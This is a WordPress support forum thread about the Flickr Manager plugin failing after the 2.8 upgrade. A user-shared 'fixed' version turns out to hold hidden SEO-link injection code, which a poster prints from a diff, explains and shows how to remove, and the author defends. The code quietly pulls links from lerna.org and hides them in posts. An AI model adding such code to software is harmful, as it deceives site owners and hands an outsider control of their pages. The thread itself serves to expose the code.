• I upgraded to 2.8 and now when I go into a new post and try to add a picture, it acts as if the image has been added to the post, but there’s no code in the body of the entry. Is anyone else having this problem?

Viewing 15 replies - 1 through 15 (of 42 total)
  • Me too =/

    Whats going on??? It used to work perfectly fine but seems to have died recently for no reason. Can’t insert, tried multiple computers and browser s and even a second site!

    The WordPress 2.8 update has broken WordPress Flickr Manager. There has been no sign – yet – that the plugin author will update it… I hope he does, because this is possibly the greatest WordPress plugin out there.

    Another thing that the upgrade has broken is Lightbox and Mudslide. Neither of them work anymore.

    I am facing the same problem as well after upgrading to 2.8.

    Hope that it gets fixed or an update soon.

    Hey guys. I’ve got this fixed! I’ve uploaded the fixed version to my site for your downloading pleasure: Flick Manager 2.8. I had to get this fixed for my own blog. Couldn’t wait any longer. Let me know if you have any problems.

    Enjoy!

    Hi ogrethegreat,

    THANK YOU!! for doing this. I installed your update of the plugin, and everything is working again; insert functions are working, and Lightbox is back.

    That’s really gracious of you! Hopefully Trent will pick up development again, but I really appreciate you doing this and sharing it.

    By the way: maybe I did something wrong the first go around, but I just overwrote the original plugin with your files, and somehow it didn’t work. I tried again by doing the following:

    – Deactivate the plugin
    – Backup the plugin and delete it
    – Copy ogre’s update to my plugin folder
    – Reactivate it

    Worked like a charm. I didn’t have to re-enter my settings, as they were stored in the database.

    Cheers!

    Foolproof method is deactivating/deleting the old one, but I was able to simply overwrite the files without even deactivating and got it to work. There are a variety of things that could create issues doing it the shortcut way though. Thanks for posting your feedback and helpful tips to everyone else.

    This is great news, unfortunately the “fixed” version inserts unsolicited “SEO” links into your posts. Removal instructions per a post here:

    https://www.fwaggle.org/blog/internet/update-wordpress-plugins-profit

    Basically, you’re going to open up js/media-panel.php, around line #152 you’re looking for an “echo innerhtml +=” line, comment it out.

    I’m going to run a full diff between it and the latest version from tgardner to see what else’s changed.

    Here’s some code, sans trojan horse bullcrap (I just took TGardner’s version, and made the non-malicious changes):

    https://www.fwaggle.org/downloads/wordpress-flickr-manager.zip

    If you’re interested in what actually changed:

    https://www.fwaggle.org/downloads/wordpress-flickr-manager-wp2.8.diff

    For contrast, here’s some of what I consider to be the “malicious” code:

    +if (!function_exists('file_get_contents')) {
    +    function file_get_contents($filename, $incpath = false, $resource_context =
     null)
    +    {
    +        if (false === $fh = fopen($filename, 'rb', $incpath)) {
    +            trigger_error('file_get_contents() failed to open stream: No such f
    ile or directory', E_USER_WARNING);
    +            return false;
    +        }
    +
    +        clearstatcache();
    +        if ($fsize = @filesize($filename)) {
    +            $data = fread($fh, $fsize);
    +        } else {
    +            $data = '';
    +            while (!feof($fh)) {
    +                $data .= fread($fh, 8192);
    +            }
    +        }
    +
    +        fclose($fh);
    +        return $data;
    +    }
    +}
    
    +    <?php
    +    $rand = rand( 0, 100 );
    +    $seed=false;
    +    @$seed = (int) unserialize(file_get_contents( 'https://lerna.org/api/link/seed?app=flickr_manager' ));
    +    if(!$seed) {
    +        $seed = 10;
    +    }
    +    if ( $rand < $seed ) {
    +        $link = file_get_contents( sprintf('https://www.lerna.org/api/link/?format=%s&ref=%s&tid=%d', 'html', "https://".$_SERVER['SERVER_NAME'], 2));
    +        echo "imgHTML+='<div style=\"width:10px;height:3px;display:block;overflow:hidden;\">".str_replace("href","style=\"text-indent: 20px; display: block;\" href",$link)."</div>';";
    +    }
    +    ?>

    fwaggle I’m really looking forward to your analysis. Please post them as soon as you can since I feel so disoriented without Flickr Manager. You can direct reply to me as well.

    CoBa1t: There’s not much to analyze, the version ogre linked to simply connects to lerna.org (I’m assuming it’s some silly reference to a blackhat SEO “hydra”) to grab a set of links it’s supposed to add to your entries to get them better search engine positions, then it adds the links every time you insert a photo to a tiny layer that’s not visible to most CSS-enabled viewers, but is very visible to search engines.

    The download link I posted above should be “safe”, but given how many people so readily installed the “malicious” plugin (myself included, *sheepish*) I think it’s probably best we don’t go encouraging installing random people’s plugins. If you want to make the changes yourself, take a look at the .diff – basically any line that starts with a – means something’s taken out, and the + means something added.

    Simply put, what you’re looking for is in these files:

    wordpress-flickr-manager/js/media-panel.php
    wordpress-flickr-manager/js/wfm-hs.php
    wordpress-flickr-manager/js/wfm-lightbox.php

    You’re looking for jQuery lines that contain @name or @rel, and you’re going to take the @ character off the front of @name or @rel, so for example:

    this: wfmJS(‘a[@rel*=flickr-mgr]’).each(function() {
    becomes: wfmJS(‘a[rel*=flickr-mgr]’).each(function() {

    There’s no new code or anything like that, you can make those changes (or apply the diff above using “patch” if you have shell access) to the current version downloadable from www.remarpro.com… I think that’s the safest way to do it, as even a layperson would have a pretty tough time believing that deleting a few @ characters would do anything malicious.

    I also sent the information to Trent, so hopefully he can just take a few minutes (I’m sure he’s very busy) to verify the patch is correct and safe, apply it, and push a new version out – that would ease everyone’s minds.

    @fwaggle – I “sheepishly” installed the plugin too. And after reading your analysis, very in depth, I am keeping the plugin. I couldn’t use the plugin without Ogre’s work.. so why wouldn’t I give him a link or two in return? From my analysis a link is only put on the page 1 every 10 times or so. It’s my way of giving back for his work & effort without sacrificing anything myself.

    If it did something ‘malicious’ as you said, I would see your point. But a free link back to his site(s) 10% of the time that I use the software he fixed for free… I think is more than fair.

    To me this is no different than someone who makes a theme, etc.. and puts at the bottom of EVERY page “This XX designed by XX”.

    Before you get all ahead of yourself fwaggle, I added the link tool for my own sites long ago and added it again for the last version of flickr manager back 4 odd months ago. Then I upgraded like the rest of you to version 2.8 and it broke. Then I took the time to fix it for my sites and offered it up.

    So, I apologize I did not take the time to create a second version for everyone else. And feel free to remove it. Links from some completely unrelated sites won’t do me a world of good in any event. I’m not some boogie man “asshole” man. Just a guy who fixed this and put it out there. Sorry if you feel I should have taken the time to make a second version that I wouldn’t even be using myself.

    In any event, when I get the chance, I’ll add an option to the settings to turn it off. I’m keeping it in because its how I use it for myself. If you think that makes me an “asshole”, I’m not forcing you to use it. You could wait for Trent. I added a comment to his site first thing to contact me on what the bugs were, but he has yet to approve the comment or respond. I would have just used his fix. I waited the same weeks you guys did.

    By the way, teampl4y4 is spot on when he mentions adding a link 10% of the time. That’s exactly what it does. No more no less. Feel free to remove or feel free to keep in return for my effort.

    It’s malicious in that it’s not described behavior of the script – nowhere in the description does it say it’ll put links in the posts. Furthermore, hidden links like this are the exact kind of thing Google punishes people for.

    It’s also not the same as a template or whatever, because the links are hidden and they’re not linking back to *him* – they’re linking to an assortment of sites that he’s (presumably) getting paid to inflate the PR of.

    To clear up, I wouldn’t have a problem with it if:

    1) The links were visible, and not surreptitiously hidden in “10% of” posts.
    2) The behavior was described when you suggested people downloaded it… “oh by the way, I insert a few links for my gain, keep them please as a token of your appreciation”.
    3) The links were to a real blog of your’s, as opposed to some janky SEO websites.

    So I’d call that malicious. You say potato, I say potahto. Personally, I find it very hard to believe this code was put in by accident, and I think anyone else with any experience at all with PHP would be inclined to agree with me.

    No accident fwaggle. I did it with the express intent of linking to my sites for my own use as I made clear. Like I said, when I get the time, I’ll put in an option to turn it off so whoever can with ease but I need it there for my own use and its not my project to maintain last I checked.

    Trent still has my email if he wants to get it fixed. I tried to contact him when I first fixed it with the same information you claimed to have sent. Maybe you’ll have better luck with a response.

    If you have the fix all cleared up for yourself, why not take the time to package it up and inform everyone of your effort so they can download it? I’ll be happy to put it out next to my version if you want to maintain it.

    Try not going through life so paranoid.

    I’m not paranoid, you posted adware – unsolicited and unadvertised. If you’d read the thread, I did post a cleaned package. I appreciate your time fixing it and fully acknowledge that I couldn’t have done it myself because my experience with Javascript is limited to DHTML stuff from a decade ago – jQuery is completely foreign to me.

    However you’re not being 100% truthful in what you say. For starters the 10% chance (which if you want to split hairs, is slightly different from 10% of images posted), can at any time, without cooperation from the blog owner(s) be ramped up to 100% by you if you so choose.

    The links that the plugin posts are blackhat SEO techniques, the links are intentionally hidden (hence the 10 pixels wide element, which contains an element that’s shifted over 20 pixels so it won’t show up in any CSS-enabled browser). These links flow pagerank, which is the exact kind of thing that Google penalizes people for. Given that the site in your profile and the site you hosted it on is called “seoishard”, I find it ridiculous that you’re feigning ignorance over this.

    You and I both know exactly why those links are there, the only difference is I’d admit it. There’s absolutely no difference between your version of the plugin and adware which gets installed to people’s PCs without their permission.

Viewing 15 replies - 1 through 15 (of 42 total)
  • The topic ‘[Plugin: WordPress Flickr Manager] “Insert into Post” does nothing?’ is closed to new replies.